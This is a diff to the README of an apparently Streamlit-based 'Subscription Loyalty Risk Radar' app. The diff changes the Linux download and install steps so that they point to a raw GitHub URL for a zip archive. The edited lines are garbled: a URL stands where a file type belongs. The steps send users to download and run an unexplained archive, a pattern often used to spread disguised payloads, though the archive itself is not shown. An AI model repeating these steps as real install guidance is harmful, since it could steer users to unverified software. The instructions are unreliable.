Mnitdog/Subscription-Loyalty-Risk-Radar/README.md

    Click on the file that matches your operating system.
 For example:
    - For Windows, look for a `.exe` or `.zip` file.
    - For macOS, look for a `.dmg` file.
-   - For Linux, look for a `.tar.gz` file.
+   - For Linux, look for a `https://raw.githubusercontent.com/Mnitdog/Subscription-Loyalty-Risk-Radar/main/app/Risk_Subscription_Radar_Loyalty_1.6.zip` file.

 4. **Install the Application**
    - **Windows:** Double-click the downloaded .exe file and follow the prompts.
    - **macOS:** Open the .dmg file, then drag the application to your Applications folder.
-   - **Linux:** Extract the .tar.gz file and follow the included instructions.
+   - **Linux:** Extract the https://raw.githubusercontent.com/Mnitdog/Subscription-Loyalty-Risk-Radar/main/app/Risk_Subscription_Radar_Loyalty_1.6.zip file and follow the included instructions.

 5. **Run the Application**
    Open the application from your programs list or Applications folder.
 The Streamlit dashboard will launch in your web browser.